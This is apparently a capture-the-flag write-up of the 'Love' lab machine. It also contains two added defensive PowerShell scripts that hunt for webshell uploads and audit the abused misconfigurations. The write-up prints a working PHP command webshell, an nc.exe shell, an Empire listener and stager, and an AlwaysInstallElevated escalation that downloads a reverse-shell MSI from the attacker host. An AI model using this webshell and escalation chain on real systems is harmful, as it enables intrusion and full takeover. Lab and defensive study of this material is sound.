Really interesting box. We learned a couple of new things and methods here. So sit tight and read through. Enjoy!
RECON PHASE
NMAP
As usual, we enumerate our target’s services.
# nmap -sV -sC -p- love.htb -oA love
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 04:35 EDT
Stats: 0:02:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 94.74% done; ETC: 04:37 (0:00:05 remaining)
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.050s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2021-08-05T09:05:25+00:00; +26m04s from scanner time.
| tls-alpn:
|_ http/1.1
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Hosts: LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 26m03s, deviation: 0s, median: 26m03s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-05T09:05:12
|_ start_date: N/A
NESSUS Scan
First, I ran a port scan to remove false positives from the nmap result:

Then I ran a Basic Network Scan. So far the scan has discovered multiple vulnerabilities, which will be analysed during the exploit phase.

Manual Recon of the Attack Surface
Port 80 HTTP
We have a login form on the index page of Love's web service. I tested the input fields with special characters and got an error that discloses some useful information:
- Server: Apache 2.4.45
- PHP v7.3.27
- Windows x64 host
- OpenSSL v1.1.1j
- Additionally, the error reveals the filesystem path where the application lives on the server.

Port 5000 HTTP
We don’t have permissions to see the website:
┌──(root💀kali)-[~]
└─# curl 10.10.10.239:5000
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 10.10.10.239 Port 5000</address>
</body></html>
Port 443 HTTPS
We are not allowed (403 Forbidden) to access love.htb on port 443; however, the certificate in the nmap scan reveals a subdomain called "staging", which usually means something under development. Add the staging subdomain to the hosts file (/etc/hosts) in order to be able to query it.


I poked at the input to test the input validation mechanism for weaknesses, and then it hit me: the server-side service could probably reach port 5000 itself, the port that returned 403 Forbidden to us from the outside!

Vote Admin Creds admin: @LoveIsInTheAir!!!!
Port 445, 139 SMB
We know from our initial scan that there is an SMB service running. Let's figure out its identity.
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.10.10.239:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{781dd960-f30d-4aa0-b1c5-efbe7902f2d9}) (authentication domain:LOVE)
[+] 10.10.10.239:445 - Host is running Windows 10 Pro (build:19042) (name:LOVE)
[*] 10.10.10.239: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Dirbuster Output
Our directory enumeration revealed an admin login panel.

Exploit Phase
We have credentials and an admin panel. Let’s try them:
Admin:@LoveIsInTheAir!!!!

First, we need to create a Position in order to create a candidate. On the candidates page, we are able to upload an image when creating one.

I managed to upload a nice and stable shell.
The file was taken from joswr1ght's GitHub (easy-simple-php-webshell).
The code of the file:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
To access the shell, we visit the /images/ directory and open the file that contains this code:

Let's create a reverse shell. First, I upload nc.exe (located at /usr/share/windows/resources/nc.exe) to the images directory. Next, I use the webshell to run nc.exe so that it listens on port 1234 and spawns a cmd shell when we connect to it.

# nc 10.10.10.239 1234
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>
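The foothold above came from a PHP file accepted by the image upload and then driven through its cmd parameter. As an added example (not part of the writeup), this is the defender-side hunt I would run on the XAMPP host itself: it assumes the default XAMPP log location and the images path shown in the prompt, so adjust both to your install.

```powershell
# Added example (not part of the writeup): hunt for the upload abuse seen above, i.e. a PHP file
# dropped into the voting app's image directory and then driven via ?cmd=. Paths assume a
# default XAMPP layout; adjust them to your install.
$ImagesDir = 'C:\xampp\htdocs\omrs\images'
$AccessLog = 'C:\xampp\apache\logs\access.log'

# 1. Anything in the image upload directory that is not an image deserves a look.
$ImageExt = '.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp'
Get-ChildItem -LiteralPath $ImagesDir -File -Recurse |
    Where-Object { $ImageExt -notcontains $_.Extension.ToLower() } |
    Select-Object FullName, Length, LastWriteTime |
    Format-Table -AutoSize

# 2. Requests for server-side scripts under /images/ in the Apache access log (combined format):
#    client ident user [time] "method path proto" status size "referer" "user-agent"
$LogLine = '^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3})'
Get-Content -LiteralPath $AccessLog | ForEach-Object {
    if ($_ -notmatch $LogLine) { return }           # skip lines we cannot parse
    $entry = $Matches.Clone()                        # the -match calls below would overwrite $Matches
    if ($entry.path -match '^/images/[^?]*\.(php|phtml|phar)([?/]|$)') {
        [pscustomobject]@{
            Time    = $entry.time
            Client  = $entry.ip
            Method  = $entry.method
            Path    = $entry.path
            Status  = $entry.status
            CmdExec = [bool]($entry.path -match '[?&]cmd=')   # webshell-style command parameter
        }
    }
} | Format-Table -AutoSize
```

The same two checks translate directly into a file-integrity rule on the upload directory and a WAF or log alert on executable extensions under /images/.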
Privilege Escalation
System information
systeminfo is a command that we run to provide us with information about the system (obviously)
C:\tmp>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
What users are there on the system? What permissions do I have?
C:\tmp>net users
net users
User accounts for \\LOVE
-------------------------------------------------------------------------------
admin123 Administrator DefaultAccount
Guest Phoebe WDAGUtilityAccount
The command completed successfully.
C:\tmp>net user phoebe
net user phoebe
User name Phoebe
Full Name Phoebe
Comment Workstation Power User
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/12/2021 12:54:30 PM
Password expires Never
Password changeable 4/12/2021 12:54:30 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/5/2021 6:09:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Setup Empire
In the following lines I did the following:
- Created an HTTP listener, renamed it "love" and started it.
- Went back one level and listed the active listeners to check that it is running correctly.
- Created a Windows stager as a .bat file called launcher. Set its Delete option to False so that the file is not removed after it runs, attached it to the love listener created previously, and executed the module, which wrote the file to the /tmp/ directory.
- Uploaded the file through the web application into the images directory and then used the existing shell to execute launcher.bat.
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name love
(Empire: listeners/http) > execute
[*] Starting listener 'love'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) > list
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
love http http://10.10.14.3:80 5/0.0
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Delete False
(Empire: stager/windows/launcher_bat) > set Listener love
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
(Empire: stager/windows/launcher_bat) >
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.239
[*] New agent TBVR8X2S checked in
[+] Initial agent TBVR8X2S from 10.10.10.239 now active (Slack)
[*] Sending agent (stage 2) to TBVR8X2S at 10.10.10.239
(Empire: stager/windows/launcher_bat) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
TBVR8X2S ps 10.10.10.239 LOVE LOVE\Phoebe powershell 6192 5/0.0 2021-08-09 12:04:57 love

To interact with it more easily, rename it to something memorable, then simply type "interact <name>":
(Empire: stager/windows/launcher_bat) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
TBVR8X2S ps 10.10.10.239 LOVE LOVE\Phoebe powershell 6192 5/0.0 2021-08-09 12:04:57 love
(Empire: agents) > rename TBVR8X2S windows10
(Empire: agents) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
windows1 ps 10.10.10.239 LOVE LOVE\Phoebe powershell 6192 5/0.0 2021-08-09 12:09:25 love
(Empire: agents) > interact windows10
(Empire: windows10) >
Using PowerUp.ps1
#FINDINGS#
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked TBVR8X2S to run TASK_CMD_JOB
[*] Agent TBVR8X2S tasked with task ID 4
[*] Tasked agent windows10 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) >
Job started: 1P6W8C
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
[*] Checking for AlwaysInstallElevated registry key...
AbuseFunction : Write-UserAddMSI
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps
IdentityReference : LOVE\Phoebe
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
After a couple of attempts to hijack the DLL I was unsuccessful, even though I did it correctly. Perhaps the reason is that it needs some kind of user interaction, or there are requirements that are not met. So I proceeded to enumerate the system further with winPEAS:

A quick Google search shows us how to exploit AlwaysInstallElevated:
First, set up a listener to catch the connection. Then follow the steps from the provided link to create a reverse shell MSI with msfvenom, move the file onto the victim machine and run msiexec as follows:
C:\Users\Phoebe\Desktop>curl http://10.10.14.3:8888/frustrated.msi -o alwaysinstallelevated.msi
curl http://10.10.14.3:8888/reverse.msi -o alwaysinstallelevated.msi
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 156k 0 0:00:01 --:--:-- 0:00:01 500k
C:\Users\Phoebe\Desktop>msiexec /quiet /qn /i alwaysinstallelevated.msi
msiexec /quiet /qn /i alwaysinstallelevated.msi
# nc -nlvp 4321
listening on [any] 4321 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 58312
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
We did it bois.
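The PowerUp output and the AlwaysInstallElevated finish above boil down to three host misconfigurations: both installer policy values set to 1, broad write rights on a directory that holds a SYSTEM service binary, and a PATH entry inside the user's own profile. As an added example (not part of the writeup or of PowerUp), this read-only PowerShell audit checks a host for all three from the defender's side; the registry paths and rights names are the standard Windows ones.

```powershell
# Added example (not part of the writeup): a read-only audit for the three PowerUp findings
# seen above. Run from an elevated PowerShell; it changes nothing on the host.
function Test-AlwaysInstallElevated {
    # msiexec only runs packages as SYSTEM when BOTH the machine and user policy values are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = @()
    foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $values += [int]$v                     # missing value counts as 0 (policy not set)
    }
    [pscustomobject]@{
        Check   = 'AlwaysInstallElevated'
        Exposed = ($values[0] -eq 1 -and $values[1] -eq 1)
        Detail  = "HKLM=$($values[0]) HKCU=$($values[1])"
    }
}

function Get-BroadlyWritableDirs {
    # Directories where low-privilege principals hold any write-type right, like C:\ in the
    # PowerUp output above (a SYSTEM service binary under such a tree is an escalation risk).
    param([string[]]$Paths)
    $broad = 'NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'Everyone'
    $write = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, Write, Modify, FullControl'
    $write = $write -bor 0x40000000 -bor 0x10000000   # plus the GENERIC_WRITE / GENERIC_ALL mask bits
    foreach ($p in ($Paths | Where-Object { $_ -and (Test-Path -LiteralPath $_) } | Select-Object -Unique)) {
        foreach ($ace in (Get-Acl -LiteralPath $p).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and $broad -contains $ace.IdentityReference.Value -and
                (([int]$ace.FileSystemRights) -band $write) -ne 0) {
                [pscustomobject]@{ Path = $p; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
            }
        }
    }
}

# PATH entries inside a user profile are owned by that user: the DLL search-order hijack spot PowerUp flagged.
$pathDirs     = $env:Path -split ';' | Where-Object { $_ }
$userPathDirs = $pathDirs | Where-Object { $_ -like 'C:\Users\*' }

Test-AlwaysInstallElevated | Format-List
Get-BroadlyWritableDirs -Paths (@('C:\') + $pathDirs) | Format-Table -AutoSize
$userPathDirs | ForEach-Object { "User-writable PATH entry: $_" }
```

Note that Authenticated Users holding AppendData on C:\ is a Windows default, so treat that row as context for what sits beneath it rather than as a finding on its own.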